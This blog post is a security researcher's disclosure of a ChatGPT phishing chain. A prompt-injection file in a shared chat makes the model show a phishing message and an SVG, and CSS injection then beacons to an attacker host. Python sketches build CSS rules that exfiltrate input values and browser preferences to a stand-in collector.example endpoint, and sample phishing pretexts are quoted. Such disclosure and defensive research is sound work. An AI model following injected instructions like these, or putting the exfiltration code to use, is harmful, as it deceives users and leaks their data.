Phishing is arguably the most prevalent attack vector in the cybersecurity landscape. Affecting individuals and enterprises alike, it serves as the primary entry point for threat actors. Commonly cited figures indicate, for example, that approximately 90% of malware distributed within organizations is propagated via phishing emails.

With the rapid advancement of LLMs and Generative AI models over the past three years, phishing campaigns have become increasingly sophisticated, incorporating techniques such as Voice Spoofing and Deepfakes.

Furthermore, the rise of AI Agents and AI-based browsers (such as Comet and Atlas) has shifted attacker focus toward these agents. This trend is expected to accelerate as human intervention decreases and autonomous agents increasingly execute operations.

Even examining the OWASP Top 10 for LLMs reveals vectors that could be conceptualized as “phishing” directed at the model itself, such as the ubiquitous Prompt Injection or System Prompt Leakage.

However, analyzing these specific AI-native attacks is outside the scope of this post. For an in-depth analysis of those topics, please refer to my other blog.

Disclaimer: The information and techniques described in this article are intended solely for educational and security research purposes. The goal of this publication is to help security professionals and developers identify vulnerabilities and improve the security posture of their systems. Any use of this information for malicious purposes or on systems for which you do not have explicit authorization is strictly prohibited. The author bears no responsibility for any misuse of the information provided or any damage resulting from it.

To better understand this vector, I will begin with a brief explanation of CVE-2025-43714. This vulnerability was disclosed by the researcher zer0dac, who demonstrated that ChatGPT fails to properly handle SVG files. Specifically, when ChatGPT is prompted to generate an SVG file, it renders the file directly within the page (inline) rather than showing it as text, thereby allowing inline HTML to be injected and rendered. As the demonstration below shows, this can be abused to crash the browser.

GIF demonstrating the exploit impact (Source: zer0dac’s blog).





You might ask: If it is possible to inject Inline HTML, why is it not possible to inject JavaScript via <script> tags and execute an XSS attack?



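The reason is that OpenAI employs a Content Security Policy (CSP) to protect against XSS attacks. The policy attaches a nonce (a "number used once", freshly generated for each response) to every script the site itself serves, and the browser refuses to execute any script that does not carry the matching nonce. An attacker-injected script has no way of knowing the nonce, so it is blocked.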
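To make the nonce mechanism concrete, here is a minimal Python sketch of how a server might issue a per-response nonce. It is not OpenAI's implementation; the function names, the extra directives, and the `/static/app.js` path are assumptions chosen for illustration.

```python
import secrets


def new_nonce() -> str:
    """Return a fresh, unpredictable nonce for a single HTTP response."""
    return secrets.token_urlsafe(16)


def csp_header(nonce: str) -> str:
    """Build a CSP value that only allows scripts carrying this nonce."""
    # The object-src and base-uri directives are illustrative hardening extras.
    return f"script-src 'nonce-{nonce}'; object-src 'none'; base-uri 'none'"


def script_tag(nonce: str, src: str) -> str:
    """Render a script tag that the browser will accept under the policy above."""
    return f'<script nonce="{nonce}" src="{src}"></script>'


# One nonce per response: the header and the page's own scripts share it.
nonce = new_nonce()
print(csp_header(nonce))
print(script_tag(nonce, "/static/app.js"))  # hypothetical script path
```

The protection depends entirely on the nonce changing with every response. If the same value is reused, an attacker who observes it once can attach it to injected scripts.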

In the context of nonce implementation, I highly recommend reading the research published by Ron Masas and Imperva in 2024. In that report, Masas revealed that ChatGPT was utilizing a static nonce for all requests, a flaw that effectively nullified the security benefits of the CSP. You can read more about CSP here.

How was CVE-2025-43714 remediated? OpenAI addressed the issue by implementing a solution where SVG code is rendered within an isolated Sandbox. This ensures that raw HTML is not executed within the main chat context, effectively preventing malicious actions or client-side attacks against the user directly on the chat page.

However, even after this fix, ChatGPT’s handling of SVG differs significantly from its handling of other formats. When we request Python or JavaScript code, the model generates a code block within a container but does not execute it. In the case of SVG, the outcome is unique: the code is not merely displayed, but actively executed and rendered within the Sandbox.

Another critical nuance to note is the behavior during initial file uploads. When a file is uploaded as the first message in a new chat session without any accompanying text, ChatGPT provides no visual indication (UI feedback) that an upload has occurred. Consequently, the model’s response to the file content appears as the starting point of the conversation history.

The Implication: By leveraging the Shared Links feature, an attacker can orchestrate a highly deceptive scenario. The attacker initiates a chat session and uploads a crafted file designed to force a specific or malicious response from the model. They then generate a shareable link for the victim.

Upon accessing the shared session, the victim is immediately presented with the model’s response as the opening message (due to the lack of upload indicators).

The convergence of these two specific behaviors in ChatGPT (its unique handling of SVG files and the mechanics of the initial file upload) significantly exacerbates the risk. This combination opens the door to sophisticated phishing attacks capable of exfiltrating sensitive user data.

To fully grasp the mechanics of this vector, we must first understand how attackers can leverage Cascading Style Sheets (CSS) to exfiltrate personal information via CSS Injection.

CSS Injection is a technique where unauthorized CSS code is injected into a trusted page. While typically considered less critical than Cross-Site Scripting (XSS), it allows attackers to exfiltrate sensitive data (such as passwords or tokens) from the DOM without executing a single line of JavaScript. This is achieved using CSS Attribute Selectors combined with external resource loading.

The core mechanism relies on conditional styling: an attacker injects CSS rules that trigger a network request, usually via the background-image property, only when a specific HTML attribute matches a defined pattern (e.g., input[value^="a"]). By capturing these incoming requests on their own server, the attacker can reconstruct the sensitive data character by character.
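The conditional-styling idea can be sketched in a few lines of Python that generate one rule per candidate character. This is an illustrative sketch only: `build_probe_rules`, the `prefix` query parameter, and the `collector.example` endpoint are hypothetical names, not taken from any specific tool.

```python
from urllib.parse import quote


def build_probe_rules(known_prefix: str, alphabet: str, collector: str) -> str:
    """Emit one CSS rule per candidate next character.

    Only the rule whose selector matches the real attribute value makes the
    browser fetch its background image, so the request reveals that character.
    """
    rules = []
    for ch in alphabet:
        guess = known_prefix + ch
        # Escape backslashes and double quotes so the guess stays inside the CSS string.
        css_value = guess.replace("\\", "\\\\").replace('"', '\\"')
        url = f"{collector}?prefix={quote(guess, safe='')}"
        rules.append(
            f'input[value^="{css_value}"] {{ background-image: url("{url}"); }}'
        )
    return "\n".join(rules)


# Hypothetical collector endpoint; "a" is the prefix already recovered.
print(build_probe_rules("a", "bcd", "https://collector.example/leak"))
```

Each round extends the known prefix by the one character whose URL was requested, which is why the value is recovered one character at a time.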

For a practical demonstration, you can refer to the following GitHub repository, which illustrates how CSS can be weaponized to capture user passwords.

However, even in the absence of input fields (such as password forms), CSS Injection remains a potent threat. By pointing the url() value of the background-image property at an external server, attackers can force the browser to issue external requests, effectively exfiltrating personal data as we will demonstrate below.

How can CSS Injection be prevented? The standard defense involves enforcing strict style restrictions within the site’s Content Security Policy (CSP) (specifically via the style-src directive).

However, ChatGPT’s current CSP configuration is designed primarily to block JavaScript injection. It remains permissive regarding styles, effectively allowing the execution of arbitrary CSS.
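As a rough way to reason about whether a given policy restricts styles, the following Python sketch parses a CSP header value and checks its `style-src` fallback chain. The header strings in the usage lines are made-up examples, not ChatGPT's actual policy, and the helper names are my own.

```python
def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a CSP header value into {directive: [source expressions]}."""
    policy: dict[str, list[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            # The first occurrence of a directive wins; later duplicates are ignored.
            # Lowercasing is fine here because we only inspect keywords and prefixes.
            policy.setdefault(tokens[0].lower(), [t.lower() for t in tokens[1:]])
    return policy


def allows_inline_styles(header: str) -> bool:
    """Return True if the policy leaves inline CSS effectively unrestricted."""
    policy = parse_csp(header)
    # style-src falls back to default-src when it is absent.
    sources = policy.get("style-src", policy.get("default-src"))
    if sources is None:
        return True  # no applicable directive, so styles are not restricted
    strict = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
        for s in sources
    )
    # Browsers ignore 'unsafe-inline' once a nonce or hash source is present.
    return "'unsafe-inline'" in sources and not strict


print(allows_inline_styles("script-src 'nonce-abc'"))        # script-only policy
print(allows_inline_styles("style-src 'self' 'nonce-abc'"))  # nonce-restricted styles
```

Note that the requests made by background-image are governed by `img-src` rather than `style-src`, so a policy that limits image sources would also constrain where such a beacon can be sent.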

Consider the following attack scenario: An attacker crafts a malicious file containing a Prompt Injection payload. This payload instructs the model to generate an SVG that performs a network request to an external, attacker-controlled domain.

Crucially, the attacker also instructs ChatGPT to display a persuasive phishing message directly above the SVG block. This message leverages the model’s authority to convince the user to open the SVG in a separate tab (via the “Open in new tab” feature). Common social engineering pretexts for this might include:

- “Fill in your details to claim a 50% discount on a ChatGPT subscription by opening the image in a new tab.”

- “View the unblurred version of this image by opening it in a new tab.”

When the victim opens the SVG in a new tab, it renders as a data: URI object. Since this object is rendered within the context of the ChatGPT origin, it inherits the platform’s Content Security Policy (CSP).

However, because the existing CSP lacks specific restrictions on stylesheets (allowing arbitrary CSS), a CSS Injection attack remains viable.

What specific sensitive data can an attacker exfiltrate via this vector? Here are several key examples:



- Victim IP Address Exposure: By forcing a network request to an attacker-controlled server (triggered by the injected CSS), the victim’s public IP address is immediately revealed in the server logs.

- Browser Fingerprinting: By exploiting CSS media queries to extract Environment Preferences, an attacker can exfiltrate sensitive metadata via URI parameters. This includes the browser language, accessibility settings (such as high contrast or reduced motion), and other identifiable attributes used for fingerprinting.

- Client-Side DoS / Distributed DoS: By crafting CSS that generates a high volume of external requests (e.g., recursive calls or heavy parameter payloads), an attacker can weaponize the victim’s browser. If executed across a large number of victims simultaneously, this can facilitate a significant Distributed Denial of Service (DDoS) attack against a target infrastructure without the users’ knowledge.



- Internal Service Scanning (Client-Side SSRF): An attacker can leverage this vector to force the victim’s browser to issue requests to local or private IP addresses (e.g., 127.0.0.1 or LAN endpoints). This technique effectively functions as a client-side analogue of SSRF (Server-Side Request Forgery). Crucially, because the SVG is rendered as a data: object, it operates under a “Null Origin” (Opaque Origin). This unique origin state can, in some cases, sidestep browser restrictions that typically segregate public domains from private networks. While the attacker cannot read the response content, which the browser withholds from cross-origin callers, the request itself still reaches the destination, potentially triggering actions on vulnerable internal services (“Blind SSRF”).
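To illustrate the fingerprinting item in the list above, here is a hedged Python sketch that generates media-query rules, each of which fetches a different URL when the corresponding user preference is active. The `collector.example` endpoint, the query parameter names, and the `#probe-...` element ids are hypothetical; each selector must match an element that actually exists in the rendered document for the request to fire.

```python
from urllib.parse import urlencode

# Standard media features a stylesheet can test without any JavaScript.
MEDIA_PROBES = {
    "scheme": {
        "dark": "(prefers-color-scheme: dark)",
        "light": "(prefers-color-scheme: light)",
    },
    "motion": {"reduce": "(prefers-reduced-motion: reduce)"},
    "contrast": {"more": "(prefers-contrast: more)"},
}


def build_media_beacons(collector: str) -> str:
    """Emit one @media rule per preference value, each with its own beacon URL."""
    rules = []
    for name, options in MEDIA_PROBES.items():
        for value, query in options.items():
            # The observed preference is encoded in the query string of the request.
            url = f"{collector}?{urlencode({name: value})}"
            rules.append(
                f"@media {query} {{ #probe-{name}-{value} "
                f'{{ background-image: url("{url}"); }} }}'
            )
    return "\n".join(rules)


print(build_media_beacons("https://collector.example/fp"))  # hypothetical endpoint
```

Because only the rules whose media query matches produce a request, the set of URLs that arrive at the server describes the victim's environment preferences.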

Full Proof of Concept (PoC):

I submitted these findings to Bugcrowd; however, they classified the vector as “Not Applicable”. Nevertheless, within the past week, it appears that ChatGPT has implemented a mitigation for this issue. They have introduced a visual indicator during file uploads, a change that significantly reduces the exploitability of this vector: